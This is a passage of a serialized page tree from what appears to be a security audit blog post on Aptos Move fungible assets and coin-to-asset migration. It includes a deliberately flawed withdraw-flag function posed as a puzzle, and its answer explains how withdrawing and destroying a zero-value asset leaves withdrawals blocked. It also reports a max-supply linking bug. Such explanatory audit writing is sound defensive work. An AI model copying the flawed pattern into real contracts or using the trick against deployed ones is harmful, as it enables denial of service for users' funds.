withdraw\u003CT: key>(store: Object\u003CT>, amount: u64, transfer_ref: &TransferRef): FungibleAsset acquires [...] {\n    assert_withdraw_flag(false);\n    [...]\n    set_withdraw_flag(true);\n    fungible_asset::withdraw_with_ref(transfer_ref, store, amount)\n}\n",[68853],{"type":26,"tag":130,"props":68854,"children":68855},{"__ignoreMap":7},[68856,68951,68971,68986,69006,69049,69064,69071,69078,69197,69216,69231,69250,69293],{"type":26,"tag":137,"props":68857,"children":68858},{"class":5559,"line":5560},[68859,68863,68867,68871,68875,68879,68883,68887,68891,68895,68899,68903,68907,68911,68915,68919,68923,68927,68931,68935,68939,68943,68947],{"type":26,"tag":137,"props":68860,"children":68861},{"style":5584},[68862],{"type":32,"value":64276},{"type":26,"tag":137,"props":68864,"children":68865},{"style":5584},[68866],{"type":32,"value":8792},{"type":26,"tag":137,"props":68868,"children":68869},{"style":5584},[68870],{"type":32,"value":64285},{"type":26,"tag":137,"props":68872,"children":68873},{"style":5601},[68874],{"type":32,"value":8391},{"type":26,"tag":137,"props":68876,"children":68877},{"style":6009},[68878],{"type":32,"value":2064},{"type":26,"tag":137,"props":68880,"children":68881},{"style":5590},[68882],{"type":32,"value":7072},{"type":26,"tag":137,"props":68884,"children":68885},{"style":5584},[68886],{"type":32,"value":8517},{"type":26,"tag":137,"props":68888,"children":68889},{"style":5601},[68890],{"type":32,"value":10195},{"type":26,"tag":137,"props":68892,"children":68893},{"style":5584},[68894],{"type":32,"value":8526},{"type":26,"tag":137,"props":68896,"children":68897},{"style":5590},[68898],{"type":32,"value":7072},{"type":26,"tag":137,"props":68900,"children":68901},{"style":6009},[68902],{"type":32,"value":64162},{"type":26,"tag":137,"props":68904,"children":68905},{"style":5601},[68906],{"type":32,"value":8391},{"type":26,"tag":137,"props":68908,"children":68909},{"style":6009},[68910],{"type":32,"value":2064},{"type":26,"tag":137,"props":68912,"children":68913},{"style":5601},[68914],{"type":32,"value":9214},{"type":26,"tag":137,"props":68916,"children":68917},{"style":5584},[68918],{"type":32,"value":64334},{"type":26,"tag":137,"props":68920,"children":68921},{"style":5590},[68922],{"type":32,"value":7072},{"type":26,"tag":137,"props":68924,"children":68925},{"style":6009},[68926],{"type":32,"value":64141},{"type":26,"tag":137,"props":68928,"children":68929},{"style":5601},[68930],{"type":32,"value":1108},{"type":26,"tag":137,"props":68932,"children":68933},{"style":5584},[68934],{"type":32,"value":68579},{"type":26,"tag":137,"props":68936,"children":68937},{"style":5590},[68938],{"type":32,"value":7072},{"type":26,"tag":137,"props":68940,"children":68941},{"style":5590},[68942],{"type":32,"value":9725},{"type":26,"tag":137,"props":68944,"children":68945},{"style":6009},[68946],{"type":32,"value":68025},{"type":26,"tag":137,"props":68948,"children":68949},{"style":5601},[68950],{"type":32,"value":17395},{"type":26,"tag":137,"props":68952,"children":68953},{"class":5559,"line":5412},[68954,68959,68963,68967],{"type":26,"tag":137,"props":68955,"children":68956},{"style":5682},[68957],{"type":32,"value":68958},"    assert_withdraw_flag",{"type":26,"tag":137,"props":68960,"children":68961},{"style":5601},[68962],{"type":32,"value":165},{"type":26,"tag":137,"props":68964,"children":68965},{"style":5573},[68966],{"type":32,"value":146},{"type":26,"tag":137,"props":68968,"children":68969},{"style":5601},[68970],{"type":32,"value":6430},{"type":26,"tag":137,"props":68972,"children":68973},{"class":5559,"line":5417},[68974,68978,68982],{"type":26,"tag":137,"props":68975,"children":68976},{"style":5601},[68977],{"type":32,"value":65318},{"type":26,"tag":137,"props":68979,"children":68980},{"style":5590},[68981],{"type":32,"value":12180},{"type":26,"tag":137,"props":68983,"children":68984},{"style":5601},[68985],{"type":32,"value":14363},{"type":26,"tag":137,"props":68987,"children":68988},{"class":5559,"line":5642},[68989,68994,68998,69002],{"type":26,"tag":137,"props":68990,"children":68991},{"style":5682},[68992],{"type":32,"value":68993},"    set_withdraw_flag",{"type":26,"tag":137,"props":68995,"children":68996},{"style":5601},[68997],{"type":32,"value":165},{"type":26,"tag":137,"props":68999,"children":69000},{"style":5573},[69001],{"type":32,"value":10760},{"type":26,"tag":137,"props":69003,"children":69004},{"style":5601},[69005],{"type":32,"value":6430},{"type":26,"tag":137,"props":69007,"children":69008},{"class":5559,"line":5745},[69009,69013,69017,69021,69025,69029,69033,69037,69041,69045],{"type":26,"tag":137,"props":69010,"children":69011},{"style":5601},[69012],{"type":32,"value":68561},{"type":26,"tag":137,"props":69014,"children":69015},{"style":5590},[69016],{"type":32,"value":6072},{"type":26,"tag":137,"props":69018,"children":69019},{"style":5682},[69020],{"type":32,"value":68749},{"type":26,"tag":137,"props":69022,"children":69023},{"style":5601},[69024],{"type":32,"value":165},{"type":26,"tag":137,"props":69026,"children":69027},{"style":5584},[69028],{"type":32,"value":68579},{"type":26,"tag":137,"props":69030,"children":69031},{"style":5601},[69032],{"type":32,"value":1108},{"type":26,"tag":137,"props":69034,"children":69035},{"style":5584},[69036],{"type":32,"value":8526},{"type":26,"tag":137,"props":69038,"children":69039},{"style":5601},[69040],{"type":32,"value":1108},{"type":26,"tag":137,"props":69042,"children":69043},{"style":5584},[69044],{"type":32,"value":22900},{"type":26,"tag":137,"props":69046,"children":69047},{"style":5601},[69048],{"type":32,"value":6430},{"type":26,"tag":137,"props":69050,"children":69051},{"class":5559,"line":5850},[69052,69056,69060],{"type":26,"tag":137,"props":69053,"children":69054},{"style":5601},[69055],{"type":32,"value":65318},{"type":26,"tag":137,"props":69057,"children":69058},{"style":5590},[69059],{"type":32,"value":12180},{"type":26,"tag":137,"props":69061,"children":69062},{"style":5601},[69063],{"type":32,"value":14363},{"type":26,"tag":137,"props":69065,"children":69066},{"class":5559,"line":5878},[69067],{"type":26,"tag":137,"props":69068,"children":69069},{"style":5601},[69070],{"type":32,"value":5945},{"type":26,"tag":137,"props":69072,"children":69073},{"class":5559,"line":5891},[69074],{"type":26,"tag":137,"props":69075,"children":69076},{"emptyLinePlaceholder":18},[69077],{"type":32,"value":6276},{"type":26,"tag":137,"props":69079,"children":69080},{"class":5559,"line":5909},[69081,69085,69089,69093,69097,69101,69105,69109,69113,69117,69121,69125,69129,69133,69137,69141,69145,69149,69153,69157,69161,69165,69169,69173,69177,69181,69185,69189,69193],{"type":26,"tag":137,"props":69082,"children":69083},{"style":5584},[69084],{"type":32,"value":64276},{"type":26,"tag":137,"props":69086,"children":69087},{"style":5584},[69088],{"type":32,"value":8792},{"type":26,"tag":137,"props":69090,"children":69091},{"style":5584},[69092],{"type":32,"value":22865},{"type":26,"tag":137,"props":69094,"children":69095},{"style":5601},[69096],{"type":32,"value":8391},{"type":26,"tag":137,"props":69098,"children":69099},{"style":6009},[69100],{"type":32,"value":2064},{"type":26,"tag":137,"props":69102,"children":69103},{"style":5590},[69104],{"type":32,"value":7072},{"type":26,"tag":137,"props":69106,"children":69107},{"style":5584},[69108],{"type":32,"value":8517},{"type":26,"tag":137,"props":69110,"children":69111},{"style":5601},[69112],{"type":32,"value":10195},{"type":26,"tag":137,"props":69114,"children":69115},{"style":5584},[69116],{"type":32,"value":8526},{"type":26,"tag":137,"props":69118,"children":69119},{"style":5590},[69120],{"type":32,"value":7072},{"type":26,"tag":137,"props":69122,"children":69123},{"style":6009},[69124],{"type":32,"value":64162},{"type":26,"tag":137,"props":69126,"children":69127},{"style":5601},[69128],{"type":32,"value":8391},{"type":26,"tag":137,"props":69130,"children":69131},{"style":6009},[69132],{"type":32,"value":2064},{"type":26,"tag":137,"props":69134,"children":69135},{"style":5601},[69136],{"type":32,"value":9214},{"type":26,"tag":137,"props":69138,"children":69139},{"style":5584},[69140],{"type":32,"value":22900},{"type":26,"tag":137,"props":69142,"children":69143},{"style":5590},[69144],{"type":32,"value":7072},{"type":26,"tag":137,"props":69146,"children":69147},{"style":6009},[69148],{"type":32,"value":8445},{"type":26,"tag":137,"props":69150,"children":69151},{"style":5601},[69152],{"type":32,"value":1108},{"type":26,"tag":137,"props":69154,"children":69155},{"style":5584},[69156],{"type":32,"value":68579},{"type":26,"tag":137,"props":69158,"children":69159},{"style":5590},[69160],{"type":32,"value":7072},{"type":26,"tag":137,"props":69162,"children":69163},{"style":5590},[69164],{"type":32,"value":9725},{"type":26,"tag":137,"props":69166,"children":69167},{"style":6009},[69168],{"type":32,"value":68025},{"type":26,"tag":137,"props":69170,"children":69171},{"style":5601},[69172],{"type":32,"value":200},{"type":26,"tag":137,"props":69174,"children":69175},{"style":5590},[69176],{"type":32,"value":7072},{"type":26,"tag":137,"props":69178,"children":69179},{"style":6009},[69180],{"type":32,"value":64141},{"type":26,"tag":137,"props":69182,"children":69183},{"style":5584},[69184],{"type":32,"value":10151},{"type":26,"tag":137,"props":69186,"children":69187},{"style":5601},[69188],{"type":32,"value":25612},{"type":26,"tag":137,"props":69190,"children":69191},{"style":5590},[69192],{"type":32,"value":12180},{"type":26,"tag":137,"props":69194,"children":69195},{"style":5601},[69196],{"type":32,"value":64367},{"type":26,"tag":137,"props":69198,"children":69199},{"class":5559,"line":5930},[69200,69204,69208,69212],{"type":26,"tag":137,"props":69201,"children":69202},{"style":5682},[69203],{"type":32,"value":68958},{"type":26,"tag":137,"props":69205,"children":69206},{"style":5601},[69207],{"type":32,"value":165},{"type":26,"tag":137,"props":69209,"children":69210},{"style":5573},[69211],{"type":32,"value":10760},{"type":26,"tag":137,"props":69213,"children":69214},{"style":5601},[69215],{"type":32,"value":6430},{"type":26,"tag":137,"props":69217,"children":69218},{"class":5559,"line":5939},[69219,69223,69227],{"type":26,"tag":137,"props":69220,"children":69221},{"style":5601},[69222],{"type":32,"value":65318},{"type":26,"tag":137,"props":69224,"children":69225},{"style":5590},[69226],{"type":32,"value":12180},{"type":26,"tag":137,"props":69228,"children":69229},{"style":5601},[69230],{"type":32,"value":14363},{"type":26,"tag":137,"props":69232,"children":69233},{"class":5559,"line":6191},[69234,69238,69242,69246],{"type":26,"tag":137,"props":69235,"children":69236},{"style":5682},[69237],{"type":32,"value":68993},{"type":26,"tag":137,"props":69239,"children":69240},{"style":5601},[69241],{"type":32,"value":165},{"type":26,"tag":137,"props":69243,"children":69244},{"style":5573},[69245],{"type":32,"value":146},{"type":26,"tag":137,"props":69247,"children":69248},{"style":5601},[69249],{"type":32,"value":6430},{"type":26,"tag":137,"props":69251,"children":69252},{"class":5559,"line":6208},[69253,69257,69261,69265,69269,69273,69277,69281,69285,69289],{"type":26,"tag":137,"props":69254,"children":69255},{"style":5601},[69256],{"type":32,"value":68561},{"type":26,"tag":137,"props":69258,"children":69259},{"style":5590},[69260],{"type":32,"value":6072},{"type":26,"tag":137,"props":69262,"children":69263},{"style":5682},[69264],{"type":32,"value":68570},{"type":26,"tag":137,"props":69266,"children":69267},{"style":5601},[69268],{"type":32,"value":165},{"type":26,"tag":137,"props":69270,"children":69271},{"style":5584},[69272],{"type":32,"value":68579},{"type":26,"tag":137,"props":69274,"children":69275},{"style":5601},[69276],{"type":32,"value":1108},{"type":26,"tag":137,"props":69278,"children":69279},{"style":5584},[69280],{"type":32,"value":8526},{"type":26,"tag":137,"props":69282,"children":69283},{"style":5601},[69284],{"type":32,"value":1108},{"type":26,"tag":137,"props":69286,"children":69287},{"style":5584},[69288],{"type":32,"value":22900},{"type":26,"tag":137,"props":69290,"children":69291},{"style":5601},[69292],{"type":32,"value":5742},{"type":26,"tag":137,"props":69294,"children":69295},{"class":5559,"line":6225},[69296],{"type":26,"tag":137,"props":69297,"children":69298},{"style":5601},[69299],{"type":32,"value":6507},{"type":26,"tag":35,"props":69301,"children":69302},{},[69303],{"type":32,"value":69304},"At first glance, this code appears valid, but not to an astute reader.",{"type":26,"tag":68786,"props":69306,"children":69307},{},[69308,69313],{"type":26,"tag":35,"props":69309,"children":69310},{},[69311],{"type":32,"value":69312},"Can you spot the bug? Hint: We mentioned the root cause previously.",{"type":26,"tag":68817,"props":69314,"children":69315},{"v-slot:answer-0":7},[69316,69336],{"type":26,"tag":35,"props":69317,"children":69318},{},[69319,69321,69326,69328,69334],{"type":32,"value":69320},"The developer overlooked an important detail, which we already mentioned earlier: a fungible asset with a value of zero can also be burned! An attacker could exploit this by withdrawing 0 ",{"type":26,"tag":130,"props":69322,"children":69324},{"className":69323},[],[69325],{"type":32,"value":64112},{"type":32,"value":69327}," (since withdraw doesn’t verify if the value is greater than 0) and then burning it using ",{"type":26,"tag":130,"props":69329,"children":69331},{"className":69330},[],[69332],{"type":32,"value":69333},"fungible_asset::destroy_zero",{"type":32,"value":69335},". This would complete the transaction while keeping the \"blocked\" flag set, effectively preventing further withdrawals.",{"type":26,"tag":35,"props":69337,"children":69338},{},[69339],{"type":32,"value":69340},"It's important to understand all the features in the standard.",{"type":26,"tag":92,"props":69342,"children":69344},{"id":69343},"migrating-from-coins-to-fungible-assets",[69345],{"type":32,"value":69346},"Migrating from coins to fungible assets",{"type":26,"tag":35,"props":69348,"children":69349},{},[69350,69352,69357],{"type":32,"value":69351},"If a fungible asset is considered an upgrade to ",{"type":26,"tag":130,"props":69353,"children":69355},{"className":69354},[],[69356],{"type":32,"value":63567},{"type":32,"value":69358},", a transition mechanism becomes necessary. This is addressed through a conversion map, establishing a relationship between specific coin and fungible asset. This duality is not without its challenges.",{"type":26,"tag":69360,"props":69361,"children":69362},"note",{},[69363],{"type":26,"tag":35,"props":69364,"children":69365},{},[69366,69368,69373,69375,69380],{"type":32,"value":69367},"While the ",{"type":26,"tag":130,"props":69369,"children":69371},{"className":69370},[],[69372],{"type":32,"value":63567},{"type":32,"value":69374}," API recognizes and integrates with fungible assets, the fungible asset APIs do not have awareness of the linked ",{"type":26,"tag":130,"props":69376,"children":69378},{"className":69377},[],[69379],{"type":32,"value":63567},{"type":32,"value":470},{"type":26,"tag":35,"props":69382,"children":69383},{},[69384,69385,69391,69393,69398,69400,69405],{"type":32,"value":19206},{"type":26,"tag":130,"props":69386,"children":69388},{"className":69387},[],[69389],{"type":32,"value":69390},"coin_to_fungible_asset",{"type":32,"value":69392}," converting function automatically generates a corresponding fungible asset for a ",{"type":26,"tag":130,"props":69394,"children":69396},{"className":69395},[],[69397],{"type":32,"value":63567},{"type":32,"value":69399}," if one does not already exist. Manual creation of a fungible asset and its linkage to a ",{"type":26,"tag":130,"props":69401,"children":69403},{"className":69402},[],[69404],{"type":32,"value":63567},{"type":32,"value":69406}," is not allowed.",{"type":26,"tag":5512,"props":69408,"children":69410},{"className":5552,"code":69409,"language":5551,"meta":7,"style":7},"public fun coin_to_fungible_asset\u003CCoinType>(\n    coin: Coin\u003CCoinType>\n): FungibleAsset acquires CoinConversionMap, CoinInfo {\n    let metadata = ensure_paired_metadata\u003CCoinType>();\n    let amount = burn_internal(coin);\n    fungible_asset::mint_internal(metadata, amount)\n}\n",[69411],{"type":26,"tag":130,"props":69412,"children":69413},{"__ignoreMap":7},[69414,69442,69469,69505,69538,69571,69607],{"type":26,"tag":137,"props":69415,"children":69416},{"class":5559,"line":5560},[69417,69421,69425,69430,69434,69438],{"type":26,"tag":137,"props":69418,"children":69419},{"style":5584},[69420],{"type":32,"value":64276},{"type":26,"tag":137,"props":69422,"children":69423},{"style":5584},[69424],{"type":32,"value":8792},{"type":26,"tag":137,"props":69426,"children":69427},{"style":5584},[69428],{"type":32,"value":69429}," coin_to_fungible_asset",{"type":26,"tag":137,"props":69431,"children":69432},{"style":5601},[69433],{"type":32,"value":8391},{"type":26,"tag":137,"props":69435,"children":69436},{"style":6009},[69437],{"type":32,"value":9167},{"type":26,"tag":137,"props":69439,"children":69440},{"style":5601},[69441],{"type":32,"value":9172},{"type":26,"tag":137,"props":69443,"children":69444},{"class":5559,"line":5412},[69445,69449,69453,69457,69461,69465],{"type":26,"tag":137,"props":69446,"children":69447},{"style":5584},[69448],{"type":32,"value":63786},{"type":26,"tag":137,"props":69450,"children":69451},{"style":5590},[69452],{"type":32,"value":7072},{"type":26,"tag":137,"props":69454,"children":69455},{"style":6009},[69456],{"type":32,"value":8386},{"type":26,"tag":137,"props":69458,"children":69459},{"style":5601},[69460],{"type":32,"value":8391},{"type":26,"tag":137,"props":69462,"children":69463},{"style":6009},[69464],{"type":32,"value":9167},{"type":26,"tag":137,"props":69466,"children":69467},{"style":5601},[69468],{"type":32,"value":8577},{"type":26,"tag":137,"props":69470,"children":69471},{"class":5559,"line":5417},[69472,69476,69480,69484,69488,69493,69497,69501],{"type":26,"tag":137,"props":69473,"children":69474},{"style":5601},[69475],{"type":32,"value":200},{"type":26,"tag":137,"props":69477,"children":69478},{"style":5590},[69479],{"type":32,"value":7072},{"type":26,"tag":137,"props":69481,"children":69482},{"style":6009},[69483],{"type":32,"value":64141},{"type":26,"tag":137,"props":69485,"children":69486},{"style":5584},[69487],{"type":32,"value":10151},{"type":26,"tag":137,"props":69489,"children":69490},{"style":6009},[69491],{"type":32,"value":69492}," CoinConversionMap",{"type":26,"tag":137,"props":69494,"children":69495},{"style":5601},[69496],{"type":32,"value":1108},{"type":26,"tag":137,"props":69498,"children":69499},{"style":6009},[69500],{"type":32,"value":9297},{"type":26,"tag":137,"props":69502,"children":69503},{"style":5601},[69504],{"type":32,"value":5875},{"type":26,"tag":137,"props":69506,"children":69507},{"class":5559,"line":5642},[69508,69512,69517,69521,69526,69530,69534],{"type":26,"tag":137,"props":69509,"children":69510},{"style":5573},[69511],{"type":32,"value":5576},{"type":26,"tag":137,"props":69513,"children":69514},{"style":5584},[69515],{"type":32,"value":69516}," metadata",{"type":26,"tag":137,"props":69518,"children":69519},{"style":5590},[69520],{"type":32,"value":5593},{"type":26,"tag":137,"props":69522,"children":69523},{"style":5584},[69524],{"type":32,"value":69525}," ensure_paired_metadata",{"type":26,"tag":137,"props":69527,"children":69528},{"style":5601},[69529],{"type":32,"value":8391},{"type":26,"tag":137,"props":69531,"children":69532},{"style":6009},[69533],{"type":32,"value":9167},{"type":26,"tag":137,"props":69535,"children":69536},{"style":5601},[69537],{"type":32,"value":11037},{"type":26,"tag":137,"props":69539,"children":69540},{"class":5559,"line":5745},[69541,69545,69550,69554,69559,69563,69567],{"type":26,"tag":137,"props":69542,"children":69543},{"style":5573},[69544],{"type":32,"value":5576},{"type":26,"tag":137,"props":69546,"children":69547},{"style":5584},[69548],{"type":32,"value":69549}," amount",{"type":26,"tag":137,"props":69551,"children":69552},{"style":5590},[69553],{"type":32,"value":5593},{"type":26,"tag":137,"props":69555,"children":69556},{"style":5682},[69557],{"type":32,"value":69558}," burn_internal",{"type":26,"tag":137,"props":69560,"children":69561},{"style":5601},[69562],{"type":32,"value":165},{"type":26,"tag":137,"props":69564,"children":69565},{"style":5584},[69566],{"type":32,"value":63534},{"type":26,"tag":137,"props":69568,"children":69569},{"style":5601},[69570],{"type":32,"value":6430},{"type":26,"tag":137,"props":69572,"children":69573},{"class":5559,"line":5850},[69574,69578,69582,69587,69591,69595,69599,69603],{"type":26,"tag":137,"props":69575,"children":69576},{"style":5601},[69577],{"type":32,"value":68561},{"type":26,"tag":137,"props":69579,"children":69580},{"style":5590},[69581],{"type":32,"value":6072},{"type":26,"tag":137,"props":69583,"children":69584},{"style":5682},[69585],{"type":32,"value":69586},"mint_internal",{"type":26,"tag":137,"props":69588,"children":69589},{"style":5601},[69590],{"type":32,"value":165},{"type":26,"tag":137,"props":69592,"children":69593},{"style":5584},[69594],{"type":32,"value":64912},{"type":26,"tag":137,"props":69596,"children":69597},{"style":5601},[69598],{"type":32,"value":1108},{"type":26,"tag":137,"props":69600,"children":69601},{"style":5584},[69602],{"type":32,"value":22900},{"type":26,"tag":137,"props":69604,"children":69605},{"style":5601},[69606],{"type":32,"value":5742},{"type":26,"tag":137,"props":69608,"children":69609},{"class":5559,"line":5878},[69610],{"type":26,"tag":137,"props":69611,"children":69612},{"style":5601},[69613],{"type":32,"value":6507},{"type":26,"tag":35,"props":69615,"children":69616},{},[69617,69619,69626],{"type":32,"value":69618},"When creating a fungible asset, several pieces of information are required, such as the asset’s name, symbol, or maximum supply. During our audit of the fungible asset standard, we ",{"type":26,"tag":41,"props":69620,"children":69623},{"href":69621,"rel":69622},"https://github.com/aptos-labs/aptos-core/commit/e5f4b62b237dad4d15069d3bb0b551b2df04bf08",[45],[69624],{"type":32,"value":69625},"noticed an overlooked detail",{"type":32,"value":69627}," in the linking process.",{"type":26,"tag":5512,"props":69629,"children":69631},{"className":5552,"code":69630,"language":5551,"meta":7,"style":7},"[...]\nprimary_fungible_store::create_primary_store_enabled_fungible_asset(\n    &metadata_object_cref,\n    option::map(coin_supply\u003CCoinType>(), |_| MAX_U128),\n    name\u003CCoinType>(),\n    symbol\u003CCoinType>(),\n    decimals\u003CCoinType>(),\n    string::utf8(b\"\"),\n    string::utf8(b\"\"),\n);\n[...]\n",[69632],{"type":26,"tag":130,"props":69633,"children":69634},{"__ignoreMap":7},[69635,69650,69670,69687,69743,69764,69784,69804,69834,69861,69868],{"type":26,"tag":137,"props":69636,"children":69637},{"class":5559,"line":5560},[69638,69642,69646],{"type":26,"tag":137,"props":69639,"children":69640},{"style":5601},[69641],{"type":32,"value":3016},{"type":26,"tag":137,"props":69643,"children":69644},{"style":5590},[69645],{"type":32,"value":12180},{"type":26,"tag":137,"props":69647,"children":69648},{"style":5601},[69649],{"type":32,"value":14363},{"type":26,"tag":137,"props":69651,"children":69652},{"class":5559,"line":5412},[69653,69657,69661,69666],{"type":26,"tag":137,"props":69654,"children":69655},{"style":5601},[69656],{"type":32,"value":65209},{"type":26,"tag":137,"props":69658,"children":69659},{"style":5590},[69660],{"type":32,"value":6072},{"type":26,"tag":137,"props":69662,"children":69663},{"style":5682},[69664],{"type":32,"value":69665},"create_primary_store_enabled_fungible_asset",{"type":26,"tag":137,"props":69667,"children":69668},{"style":5601},[69669],{"type":32,"value":6054},{"type":26,"tag":137,"props":69671,"children":69672},{"class":5559,"line":5417},[69673,69678,69683],{"type":26,"tag":137,"props":69674,"children":69675},{"style":5590},[69676],{"type":32,"value":69677},"    &",{"type":26,"tag":137,"props":69679,"children":69680},{"style":5584},[69681],{"type":32,"value":69682},"metadata_object_cref",{"type":26,"tag":137,"props":69684,"children":69685},{"style":5601},[69686],{"type":32,"value":6099},{"type":26,"tag":137,"props":69688,"children":69689},{"class":5559,"line":5642},[69690,69695,69699,69704,69708,69713,69717,69721,69726,69730,69734,69738],{"type":26,"tag":137,"props":69691,"children":69692},{"style":5601},[69693],{"type":32,"value":69694},"    option",{"type":26,"tag":137,"props":69696,"children":69697},{"style":5590},[69698],{"type":32,"value":6072},{"type":26,"tag":137,"props":69700,"children":69701},{"style":5682},[69702],{"type":32,"value":69703},"map",{"type":26,"tag":137,"props":69705,"children":69706},{"style":5601},[69707],{"type":32,"value":165},{"type":26,"tag":137,"props":69709,"children":69710},{"style":5584},[69711],{"type":32,"value":69712},"coin_supply",{"type":26,"tag":137,"props":69714,"children":69715},{"style":5601},[69716],{"type":32,"value":8391},{"type":26,"tag":137,"props":69718,"children":69719},{"style":6009},[69720],{"type":32,"value":9167},{"type":26,"tag":137,"props":69722,"children":69723},{"style":5601},[69724],{"type":32,"value":69725},">(), ",{"type":26,"tag":137,"props":69727,"children":69728},{"style":5590},[69729],{"type":32,"value":13006},{"type":26,"tag":137,"props":69731,"children":69732},{"style":5584},[69733],{"type":32,"value":5666},{"type":26,"tag":137,"props":69735,"children":69736},{"style":5590},[69737],{"type":32,"value":13006},{"type":26,"tag":137,"props":69739,"children":69740},{"style":5601},[69741],{"type":32,"value":69742}," MAX_U128),\n",{"type":26,"tag":137,"props":69744,"children":69745},{"class":5559,"line":5745},[69746,69751,69755,69759],{"type":26,"tag":137,"props":69747,"children":69748},{"style":5584},[69749],{"type":32,"value":69750},"    name",{"type":26,"tag":137,"props":69752,"children":69753},{"style":5601},[69754],{"type":32,"value":8391},{"type":26,"tag":137,"props":69756,"children":69757},{"style":6009},[69758],{"type":32,"value":9167},{"type":26,"tag":137,"props":69760,"children":69761},{"style":5601},[69762],{"type":32,"value":69763},">(),\n",{"type":26,"tag":137,"props":69765,"children":69766},{"class":5559,"line":5850},[69767,69772,69776,69780],{"type":26,"tag":137,"props":69768,"children":69769},{"style":5584},[69770],{"type":32,"value":69771},"    symbol",{"type":26,"tag":137,"props":69773,"children":69774},{"style":5601},[69775],{"type":32,"value":8391},{"type":26,"tag":137,"props":69777,"children":69778},{"style":6009},[69779],{"type":32,"value":9167},{"type":26,"tag":137,"props":69781,"children":69782},{"style":5601},[69783],{"type":32,"value":69763},{"type":26,"tag":137,"props":69785,"children":69786},{"class":5559,"line":5878},[69787,69792,69796,69800],{"type":26,"tag":137,"props":69788,"children":69789},{"style":5584},[69790],{"type":32,"value":69791},"    decimals",{"type":26,"tag":137,"props":69793,"children":69794},{"style":5601},[69795],{"type":32,"value":8391},{"type":26,"tag":137,"props":69797,"children":69798},{"style":6009},[69799],{"type":32,"value":9167},{"type":26,"tag":137,"props":69801,"children":69802},{"style":5601},[69803],{"type":32,"value":69763},{"type":26,"tag":137,"props":69805,"children":69806},{"class":5559,"line":5891},[69807,69812,69816,69821,69825,69830],{"type":26,"tag":137,"props":69808,"children":69809},{"style":5601},[69810],{"type":32,"value":69811},"    string",{"type":26,"tag":137,"props":69813,"children":69814},{"style":5590},[69815],{"type":32,"value":6072},{"type":26,"tag":137,"props":69817,"children":69818},{"style":5682},[69819],{"type":32,"value":69820},"utf8",{"type":26,"tag":137,"props":69822,"children":69823},{"style":5601},[69824],{"type":32,"value":165},{"type":26,"tag":137,"props":69826,"children":69827},{"style":6837},[69828],{"type":32,"value":69829},"b\"\"",{"type":26,"tag":137,"props":69831,"children":69832},{"style":5601},[69833],{"type":32,"value":9320},{"type":26,"tag":137,"props":69835,"children":69836},{"class":5559,"line":5909},[69837,69841,69845,69849,69853,69857],{"type":26,"tag":137,"props":69838,"children":69839},{"style":5601},[69840],{"type":32,"value":69811},{"type":26,"tag":137,"props":69842,"children":69843},{"style":5590},[69844],{"type":32,"value":6072},{"type":26,"tag":137,"props":69846,"children":69847},{"style":5682},[69848],{"type":32,"value":69820},{"type":26,"tag":137,"props":69850,"children":69851},{"style":5601},[69852],{"type":32,"value":165},{"type":26,"tag":137,"props":69854,"children":69855},{"style":6837},[69856],{"type":32,"value":69829},{"type":26,"tag":137,"props":69858,"children":69859},{"style":5601},[69860],{"type":32,"value":9320},{"type":26,"tag":137,"props":69862,"children":69863},{"class":5559,"line":5930},[69864],{"type":26,"tag":137,"props":69865,"children":69866},{"style":5601},[69867],{"type":32,"value":6430},{"type":26,"tag":137,"props":69869,"children":69870},{"class":5559,"line":5939},[69871,69875,69879],{"type":26,"tag":137,"props":69872,"children":69873},{"style":5601},[69874],{"type":32,"value":3016},{"type":26,"tag":137,"props":69876,"children":69877},{"style":5590},[69878],{"type":32,"value":12180},{"type":26,"tag":137,"props":69880,"children":69881},{"style":5601},[69882],{"type":32,"value":14363},{"type":26,"tag":35,"props":69884,"children":69885},{},[69886,69888,69893],{"type":32,"value":69887},"When the linked fungible asset was created, the current ",{"type":26,"tag":130,"props":69889,"children":69891},{"className":69890},[],[69892],{"type":32,"value":63567},{"type":32,"value":69894}," supply was incorrectly passed as the maximum fungible asset supply, preventing the minting of additional fungible assets beyond the existing coin circulation.",{"type":26,"tag":35,"props":69896,"children":69897},{},[69898,69900,69905,69907,69913,69915,69920],{"type":32,"value":69899},"Users can manually migrate their ",{"type":26,"tag":130,"props":69901,"children":69903},{"className":69902},[],[69904],{"type":32,"value":63729},{"type":32,"value":69906}," to a primary fungible store. This creates a store for the paired fungible asset (if one doesn’t exist) and removes the ",{"type":26,"tag":130,"props":69908,"children":69910},{"className":69909},[],[69911],{"type":32,"value":69912},"\u003CCoinStore\u003CCoinType>>",{"type":32,"value":69914}," from the caller. All coins in the ",{"type":26,"tag":130,"props":69916,"children":69918},{"className":69917},[],[69919],{"type":32,"value":63729},{"type":32,"value":69921}," are exchanged and transferred to the new store during the migration.",{"type":26,"tag":5512,"props":69923,"children":69925},{"className":5552,"code":69924,"language":5551,"meta":7,"style":7},"/// Voluntarily migrate to fungible store for `CoinType` if not yet.\npublic entry fun migrate_to_fungible_store\u003CCoinType>(\n    account: &signer\n) acquires CoinStore, CoinConversionMap, CoinInfo {\n    maybe_convert_to_fungible_store\u003CCoinType>(signer::address_of(account));\n}\n",[69926],{"type":26,"tag":130,"props":69927,"children":69928},{"__ignoreMap":7},[69929,69937,69969,69989,70025,70066],{"type":26,"tag":137,"props":69930,"children":69931},{"class":5559,"line":5560},[69932],{"type":26,"tag":137,"props":69933,"children":69934},{"style":5564},[69935],{"type":32,"value":69936},"/// Voluntarily migrate to fungible store for `CoinType` if not yet.\n",{"type":26,"tag":137,"props":69938,"children":69939},{"class":5559,"line":5412},[69940,69944,69948,69952,69957,69961,69965],{"type":26,"tag":137,"props":69941,"children":69942},{"style":5584},[69943],{"type":32,"value":64276},{"type":26,"tag":137,"props":69945,"children":69946},{"style":5584},[69947],{"type":32,"value":65242},{"type":26,"tag":137,"props":69949,"children":69950},{"style":5584},[69951],{"type":32,"value":8792},{"type":26,"tag":137,"props":69953,"children":69954},{"style":5584},[69955],{"type":32,"value":69956}," 